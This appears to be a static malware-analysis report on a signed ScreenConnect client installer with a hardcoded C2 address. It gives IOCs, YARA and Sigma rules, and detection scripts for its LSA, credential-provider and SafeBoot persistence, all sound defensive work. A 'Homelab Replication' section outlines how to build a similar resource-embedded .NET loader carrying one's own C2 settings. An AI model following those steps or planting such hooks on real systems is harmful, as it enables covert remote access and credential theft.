---
type: analysis
family: connectwise
confidence: high
created: 2026-06-15
updated: 2026-06-15
tags: [pe, dotnet, compiler, signing, c2, mitre-attck, defense-evasion, persistence, remote-access-tool-abuse]
---
SHA-256: 7145e8299053bea02c520460f9a379711ed4455318d434fd5785981295a3a4f4

# connectwise: 7145e8 — Self-contained MSI-based ScreenConnect client installer

## Executive Summary

A 5.6 MB PE32 (MSI installer bundle) embedding the full ConnectWise ScreenConnect client stack — signed with a valid ConnectWise, LLC Authenticode certificate via DigiCert. Unlike the newer ClickOnce bootstrapper sibling (81adbf9a), this sample uses a custom C++ wrapper (DotNetRunner) to load the embedded .NET Framework 2.0 assemblies out of its .rsrc section, with a hardcoded C2 endpoint (134.122.4.2:8041) baked into an embedded app.config. No CAPE detonation available (no Windows guest); static-only analysis.

## What It Is

- **Format:** PE32 executable (GUI), Intel 80386, 5 sections ^[file.txt]
- **Size:** 5,641,504 bytes
- **Compile time:** Fri Nov 18 20:10:20 2022 UTC ^[pefile.txt:34]
- **Linker:** MSVC 14.33 (Visual Studio 2019/2022, linker 14.33) ^[exiftool.json:18]
- **PDB path:** `C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb` ^[strings.txt:125] ^[rabin2-info.txt:13]
- **Language:** C/C++ native wrapper bootstrapping embedded .NET 2.0 assemblies (CIL runtime loaded via `mscoree!CorBindToRuntimeEx`) ^[rabin2-info.txt:19] ^[pefile.txt:239]
- **Signed:** Valid Authenticode signature by ConnectWise, LLC (Tampa, Florida), issued by DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 ^[binwalk.txt:30-46] ^[rabin2-info.txt:29]
- **Subsystem:** Windows GUI (`asInvoker` execution level from embedded manifest) ^[rabin2-info.txt:34]
- **Guard flags:** `/DYNAMICBASE`, `/NXCOMPAT`, Terminal Server aware; no CFG ^[pefile.txt:73]
- **No packing, no obfuscation, no anti-debug, no VM checks.** Evasion is the signature itself. ^[triage.json]

OpenCTI labels: connectwise, exe, urlhaus ^[triage.json:7-11].

## How It Works

### Stage 1 — Native C++ Bootstrap

`entry0` is standard MSVC CRT startup (security-cookie init, TLS callback dispatch) that calls `main` at `0x401140` ^[rabin2-info.txt]. The wrapper:

1. Loads `mscoree.dll` via `LoadLibraryW`.
2. Resolves `CorBindToRuntimeEx` to spin up the CLR 2.0 runtime ^[pefile.txt:239].
3. Enumerates named resources in the `.rsrc` section and loads the embedded assemblies reflectively.

### Stage 2 — Embedded .NET Assemblies in .rsrc

The `.rsrc` section contains five named resource entries (all `LANG_NEUTRAL`):

| Resource Name | Offset | Size | Content |
|---|---|---|---|
| `SCREENCONNECT.CORE` | 0x163D4 | 0x86800 | Core assembly (ScreenConnect.Core.dll) ^[pefile.txt:354] |
| `SCREENCONNECT.WINDOWS` | 0x9CBD4 | 0x1A6200 | Windows-specific assembly ^[pefile.txt:374] |
| `SCREENCONNECT.WINDOWSINSTALLER` | 0x242DD4 | 0x1AC00 | Installer assembly ^[pefile.txt:394] |
| `[_ENTRYPOINT]` | 0x25D9D4 | 0x2EE318 | Likely compressed / encrypted payload stub or entrypoint assembly ^[pefile.txt:414] |
| `[_RESOLVER]` | 0x54BCEC | 0x1600 | Certificate / timestamp resource ^[pefile.txt:434] |

This is structurally the full ScreenConnect client installer — not a minimal bootstrapper. The `_ENTRYPOINT` resource (3 MB) is likely the MSI payload or a compressed cabinet.

### Stage 3 — Hardcoded C2 Configuration

An embedded app.config (extracted from offset 0x54D2EC, size 0x188) contains the C2 endpoint:

```xml
<value>?h=134.122.4.2&amp;p=8041&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQCpRFw9...</value>
```
^[strings.txt:21148]

Parameters:
- `h=134.122.4.2` — C2 relay host ^[strings.txt:20622]
- `p=8041` — listener port ^[strings.txt:20622]
- `k=` — base64-wrapped RSA public key / session key for ScreenConnect pairing ^[strings.txt:20622]

**Same C2 infrastructure as sibling `81adbf9a`** — shared IP, port, and key blob format. The divergence is deployment mechanism: this sample embeds the full installer and runs it via a .NET loader; `81adbf9a` delegates to ClickOnce/dfshim.
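An added triage helper (not code from the sample or from ConnectWise) that pulls `h`/`p`/`k` out of such a `<value>` element and decodes the start of the `k=` blob. The decoded prefix has the Microsoft CAPI `PUBLICKEYBLOB` layout (`BLOBHEADER` followed by `RSAPUBKEY` with magic `RSA1`), which is what the helper checks; the sample input is constructed from the truncated excerpt above, so the modulus is reported as incomplete.

```python
"""Parse a ScreenConnect client config <value> (?h=host&p=port&k=blob) and
check the k= blob header. Added triage helper, not code from the sample."""
import base64
import html
import struct
from urllib.parse import parse_qs

# Constructed input: the report's excerpt, cut at the 32 base64 chars shown.
SAMPLE_VALUE = ("<value>?h=134.122.4.2&amp;p=8041"
                "&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQCpRFw9</value>")

CALG_RSA_KEYX = 0x0000A400  # CAPI ALG_ID: RSA key exchange
PUBLICKEYBLOB = 0x06        # BLOBHEADER.bType for a public key


def parse_key_blob(blob: bytes) -> dict:
    """Decode BLOBHEADER + RSAPUBKEY; the modulus that follows may be truncated."""
    if len(blob) < 20:
        raise ValueError("blob shorter than BLOBHEADER + RSAPUBKEY")
    b_type, _ver, _reserved, alg_id = struct.unpack("<BBHI", blob[:8])
    magic = blob[8:12]                       # b"RSA1" for a public key
    bit_len, pub_exp = struct.unpack("<II", blob[12:20])
    return {
        "is_rsa_public_key": (b_type == PUBLICKEYBLOB and magic == b"RSA1"
                              and alg_id == CALG_RSA_KEYX),
        "bits": bit_len,
        "exponent": pub_exp,
        # header (20 bytes) + little-endian modulus of bit_len/8 bytes
        "modulus_complete": len(blob) >= 20 + bit_len // 8,
    }


def parse_screenconnect_config(value_element: str) -> dict:
    """Return host, port and key-blob facts from one <value>...</value> string."""
    inner = value_element.strip().removeprefix("<value>").removesuffix("</value>")
    query = html.unescape(inner).lstrip("?")   # &amp; -> & before splitting
    params = parse_qs(query, keep_blank_values=True)
    k = params.get("k", [""])[0]
    k += "=" * (-len(k) % 4)                   # restore stripped base64 padding
    return {
        "host": params.get("h", [""])[0],
        "port": int(params.get("p", ["0"])[0]),
        "key": parse_key_blob(base64.b64decode(k)),
    }
```

Run it over every `<value>?h=` hit in a strings dump to pair each relay host/port with the key it was built against; a full blob for a 2048-bit key is 276 bytes.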

### Stage 4 — Windows Installer (MSI) Artifacts

Binwalk additionally finds two Cabinet archives (`0x26194C` and `0x41B74C`) and MSI descriptor strings inside the `_ENTRYPOINT` resource ^[binwalk.txt:23-25]. The strings table includes:

- `InstallExecuteSequence`, `InstallUISequence`, `LaunchCondition`
- `ProductCode {B292C5EA-BF5F-4280-B056-1670FB10BB1D}`
- `ProductVersion 25.2.4.9229`
- `Manufacturer ScreenConnect Software`
- `ProgramFilesFolder`, `INSTALLLOCATION`
- Service installation entries for `ScreenConnect.ClientService.exe` ^[strings.txt:20275-20277]
- Registry keys for `SafeBoot\Network\[SERVICE_NAME]`, `Lsa\Authentication Packages`, `Credential Providers` ^[strings.txt:20277]

This binary is a **self-extracting MSI bundle** — the native wrapper unpacks and runs the embedded Windows Installer package, which installs ScreenConnect as a system service and registers credential-provider and LSA authentication-package DLLs.

## Decompiled Behavior

**`entry0`** (`0x004014ad`): Standard MSVC CRT `__tmainCRTStartup` — initializes security cookie, runs `__initterm` dynamic initializers, calls `main` at `0x401140`. ^[r2:entry0]

**`main`**: Not fully decompiled due to the .NET runtime indirection. The native side is a thin loader; actual logic lives in the embedded CIL assemblies. What we can observe:
- No direct socket API imports (no `WinINet`, `WinHTTP`, no `WSAStartup`).
- No Crypt32 imports (unlike `81adbf9a`). Certificate trust is handled by the MSI engine during installation, not by this wrapper.
- No anti-debug or anti-VM code paths. The binary trusts the MSI/UAC elevation model and the valid Authenticode signature for evasion.

## C2 Infrastructure

| Indicator | Value | Notes |
|---|---|---|
| **IP** | `134.122.4.2` | C2 host, hard-coded in app.config ^[strings.txt:20622] |
| **Port** | `8041` | Listener port ^[strings.txt:20622] |
| **Key blob** | `BgIAAACkAABSU0ExAAgAA...` | RSA public key / session key ^[strings.txt:20622] |
| **Product** | `ScreenConnect` (v25.2.4.9229) | Version string in resources ^[strings.txt:5153] |
| **Certificate CN** | `ConnectWise, LLC` | Valid DigiCert-issued code-signing cert ^[rabin2-info.txt:29] |

Static-only; no observed DNS or secondary C2.

## Interesting Tidbits

- **Valid signer with attacker-controlled C2.** The binary carries a legitimate ConnectWise Authenticode signature (DigiCert chain). This implies either a stolen certificate or a compromised build artifact. Once installed via MSI UAC elevation, it registers services and credential providers under a trusted vendor name. ^[strings.txt:5097]
- **Full installer vs. bootstrapper.** This sample (`7145e8`, 5.6 MB, Nov 2022) predates the ClickOnce runner style (`81adbf9a`, 305 KB, Apr 2025) by ~2.5 years. The attacker evolved from bundling the full MSI to a minimal ClickOnce wrapper that stages from the network. See [connectwise](/intel/families/connectwise.html) entity page for the family timeline.
- **PDB leak reveals developer identity.** `C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb` and `C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb` point to a ConnectWise internal developer (`jmorgan`) working on a custom .NET runner project inside the `cwcontrol` repository. ^[strings.txt:125] ^[strings.txt:20429]
- **No obfuscation, no packer.** Strings, imports, PDB, and C2 configuration are all plaintext. Evasion relies entirely on the valid signature and the legitimate tool chain. ^[triage.json]
- **Embedded MSI with SafeBoot service.** The MSI payload registers a service that survives Safe Mode (Network) via `System\CurrentControlSet\Control\SafeBoot\Network\[SERVICE_NAME]` ^[strings.txt:20277]. Persistence across Safe Mode is deliberate.
- **LSA Authentication Package injection.** The MSI writes to `SYSTEM\CurrentControlSet\Control\Lsa\Authentication Packages`, inserting `ScreenConnect.WindowsAuthenticationPackage.dll` into the LSA process. This is a credential-grabbing / logon-notification hook. ^[strings.txt:20277]
- **Windows Credential Provider registration.** Also registers a custom credential provider (`CLSID\[CREDENTIAL_PROVIDER_CLASS_ID]\InprocServer32` → `ScreenConnect.WindowsCredentialProvider.dll`), which can harvest logon credentials at the interactive login screen. ^[strings.txt:20277]
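The three install-time hooks above (LSA authentication package, SafeBoot\Network service key, credential provider CLSID plus its InprocServer32 DLL) replayed over constructed Sysmon Event ID 13 (`SetValue`) records, as an added detection example that is not part of the report. The GUID, service name and DLL paths are placeholders; the only stated baseline is that a clean `Authentication Packages` value holds just `msv1_0`.

```python
"""Flag the registry writes this installer's MSI is described as making,
given Sysmon EventID 13 (SetValue) records. Added example, not from the sample;
the events below are constructed and the GUID/paths are placeholders."""
import re

LSA_PACKAGES = "\\control\\lsa\\authentication packages"
CRED_PROVIDERS = "\\authentication\\credential providers\\{"
SAFEBOOT_NET = "\\control\\safeboot\\network\\"
CLSID_INPROC = re.compile(r"\\clsid\\(\{[0-9a-f-]+\})\\inprocserver32", re.I)
GUID_RE = re.compile(r"\{[0-9a-f-]+\}", re.I)

# Constructed (TargetObject, Details) pairs in Sysmon-13 style.
EVENTS = [
    (r"HKLM\System\CurrentControlSet\Control\Lsa\Authentication Packages",
     "msv1_0 ScreenConnect.WindowsAuthenticationPackage"),
    (r"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\ScreenConnect.ClientService",
     "Service"),
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers"
     r"\{11111111-2222-3333-4444-555555555555}", "ScreenConnect Credential Provider"),
    (r"HKLM\SOFTWARE\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32",
     r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.WindowsCredentialProvider.dll"),
    (r"HKLM\SOFTWARE\Classes\CLSID\{99999999-0000-0000-0000-000000000000}\InprocServer32",
     r"C:\Windows\System32\shell32.dll"),   # unrelated COM server: must not fire
]


def find_persistence(events):
    """Return [(artifact, key, detail)] for the three install-time hooks."""
    hits, cred_guids, inproc = [], set(), {}
    for target, details in events:
        low = target.lower()
        # Any package beyond the default msv1_0 is worth a look, not only ScreenConnect's
        if low.endswith(LSA_PACKAGES) and details.strip().lower() != "msv1_0":
            hits.append(("lsa_authentication_package", target, details))
        elif SAFEBOOT_NET in low and details == "Service":
            hits.append(("safeboot_network_service", target, details))
        elif CRED_PROVIDERS in low:
            cred_guids.add(GUID_RE.search(target).group(0).lower())
        m = CLSID_INPROC.search(target)
        if m:
            inproc[m.group(1).lower()] = (target, details)
    # A credential provider only becomes live once its CLSID has an in-proc server DLL,
    # so report the DLL path rather than the bare GUID registration.
    for guid in sorted(cred_guids):
        if guid in inproc:
            hits.append(("credential_provider_dll", inproc[guid][0], inproc[guid][1]))
    return hits
```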

## How To Mess With It (Homelab Replication)

**Goal:** Reproduce a native C++ wrapper that loads embedded .NET assemblies from PE resources and passes a hard-coded app.config to the CLR.

**Toolchain:** Visual Studio 2019/2022, C++ project targeting x86, CLR hosting via `mscoree`.

**Steps:**
1. Create a new C++ Win32 project.
2. Add your .NET assemblies (DLLs) as RCData resources with string names.
3. At runtime: `CorBindToRuntimeEx(L"v2.0.50727", NULL, STARTUP_LOADER_OPTIMIZATION_MULTI_DOMAIN, &pCLRMetaHost)`.
4. Use `ICLRRuntimeHost::ExecuteInDefaultAppDomain` or load assemblies via `Assembly::Load` from resource bytes.
5. Write an `app.config` with `<applicationSettings>` containing your C2 parameters.
6. Optionally sign the wrapper with any Authenticode cert from a test CA.

**Verification:** Run on a Windows VM with ProcMon. You should see mscoree.dll loaded, resources extracted to memory, then .NET JIT activity. The process tree will show your wrapper spawning the embedded installer or RAT.

## Deployable Signatures

### YARA rule

```yara
rule connectwise_dotnetrunner_msi_bundle {
    meta:
        description = "ConnectWise DotNetRunner MSI installer bundle with embedded ScreenConnect"
        author = "triage"
        date = "2026-06-15"
        sha256 = "7145e8299053bea02c520460f9a379711ed4455318d434fd5785981295a3a4f4"
    strings:
        $pdb = "DotNetRunner.pdb" ascii wide
        $pdb2 = "DotNetResolver.pdb" ascii wide
        $core = "ScreenConnect.Core" wide
        $windows = "ScreenConnect.Windows" wide
        $installer = "ScreenConnect.WindowsInstaller" wide
        $product = "ScreenConnect Software" wide
        $version = "25.2.4.9229" wide
        $entry = "[_ENTRYPOINT]" wide
        $resolver = "[_RESOLVER]" wide
        $c2_ip = "134.122.4.2" ascii
        $c2_port = "8041" ascii
        $product_code = "{B292C5EA-BF5F-4280-B056-1670FB10BB1D}" wide
    condition:
        uint16(0) == 0x5A4D and
        ($pdb or $pdb2) and
        ($core or $windows or $installer) and
        ($c2_ip or $product_code)
}
```

### Sigma rule

```yaml
title: ConnectWise ScreenConnect MSI installer bundle execution
status: experimental
description: Detects execution of the ConnectWise DotNetRunner MSI bundle embedding hardcoded C2.
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - CommandLine|contains:
            - 'ScreenConnect.WindowsClient.exe'
            - 'ScreenConnect.ClientService.exe'
        - ParentImage|endswith:
            - 'ScreenConnect.ClientInstallerRunner.exe'
        - Image|endswith:
            - 'ScreenConnect.ClientInstallerRunner.exe'
    # Registry writes are not process_creation events: deploy this selection as a
    # separate rule with logsource category: registry_set, or it will never match.
    selection_registry:
        - TargetObject|contains:
            - 'ScreenConnect.WindowsAuthenticationPackage.dll'
            - 'ScreenConnect.WindowsCredentialProvider.dll'
        - EventType: SetValue
    condition: selection or selection_registry
falsepositives:
    - Legitimate ConnectWise ScreenConnect deployments within an enterprise.
level: medium
```

### IOC list

| Type | Value |
|---|---|
| SHA-256 | `7145e8299053bea02c520460f9a379711ed4455318d434fd5785981295a3a4f4` |
| SHA-1 | `b6978a757f7342839347eaf585473da8660a6996` (.text section) |
| MD5 | `d9fa6da0baf4b869720be833223490cb` (.text section) |
| File size | 5,641,504 bytes |
| Compile time | 2022-11-18 20:10:20 UTC |
| C2 IP | `134.122.4.2` |
| C2 Port | `8041` |
| Product version | 25.2.4.9229 |
| Product code | `{B292C5EA-BF5F-4280-B056-1670FB10BB1D}` |
| Certificate CN | ConnectWise, LLC |
| Certificate issuer | DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 |
| Service name pattern | `ScreenConnect.ClientService` (runtime-resolved) |
| Registry key (persistence) | `SYSTEM\CurrentControlSet\Control\Lsa\Authentication Packages` |
| Registry key (SafeBoot) | `System\CurrentControlSet\Control\SafeBoot\Network\[SERVICE_NAME]` |
| Registry key (Credential Provider) | `SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\[GUID]` |

### Behavioral fingerprint

This binary is a native PE32 wrapper that loads mscoree.dll and initializes the CLR 2.0 runtime via CorBindToRuntimeEx. It extracts multiple large RCData resources named SCREENCONNECT.CORE, SCREENCONNECT.WINDOWS, and SCREENCONNECT.WINDOWSINSTALLER from its .rsrc section, then passes control to embedded CIL assemblies. The wrapper contains no direct network imports — all C2 configuration is read from an embedded app.config (XML) that specifies an IP (134.122.4.2), port (8041), and RSA session key. Post-installation, the MSI payload registers a Windows service (SafeBoot network compatible), an LSA authentication package DLL, and a Windows credential provider DLL. The binary is signed with a valid DigiCert-issued Authenticode certificate in the name of ConnectWise, LLC.

## Detection Signatures

| Capability | ATT&CK ID | Evidence |
|---|---|---|
| Native + .NET runtime bootstrap | | `CorBindToRuntimeEx` + RCData resource loading ^[pefile.txt:239] |
| Embedded MSI installer execution | T1204.002 | Cabinet archives + MSI sequence tables ^[binwalk.txt:23-25] |
| Remote access software abuse | T1219 | ScreenConnect client components embedded ^[strings.txt:13773-13784] |
| Ingress tool transfer | T1105 | Hard-coded C2 endpoint in app.config ^[strings.txt:21148] |
| Service persistence | T1543.003 | MSI ServiceInstall + `SafeBoot\Network` registry ^[strings.txt:20277] |
| LSASS credential access | T1003.001 | LSA Authentication Package registration ^[strings.txt:20277] |
| Credential Provider abuse | T1056.001 | Custom credential provider DLL registration ^[strings.txt:20277] |
| Valid account / signed binary | T1078 | Authenticode-signed by ConnectWise, LLC ^[rabin2-info.txt:29] |
| Boot or Logon Autostart Execution | T1547.012 | Credential provider registration at install time ^[strings.txt:20277] |

## References

### Provenance

- `file.txt` — file(1) output
- `exiftool.json` — ExifTool PE metadata
- `pefile.txt` — pefile library dump
- `strings.txt` — strings(1) extraction
- `binwalk.txt` — Binwalk embedded-artifact scan
- `rabin2-info.txt` — radare2 binary header summary
- `triage.json` — triage pipeline metadata
- `dynamic-analysis.md` — CAPE status: skipped (no Windows guest available)
- radare2 decompilation of `entry0` at `0x4014ad`
- Manual DER certificate extraction from `IMAGE_DIRECTORY_ENTRY_SECURITY` at offset 0x54A600

Tools: ExifTool 12.76, pefile, radare2 5.x, binwalk, strings, openssl pkcs7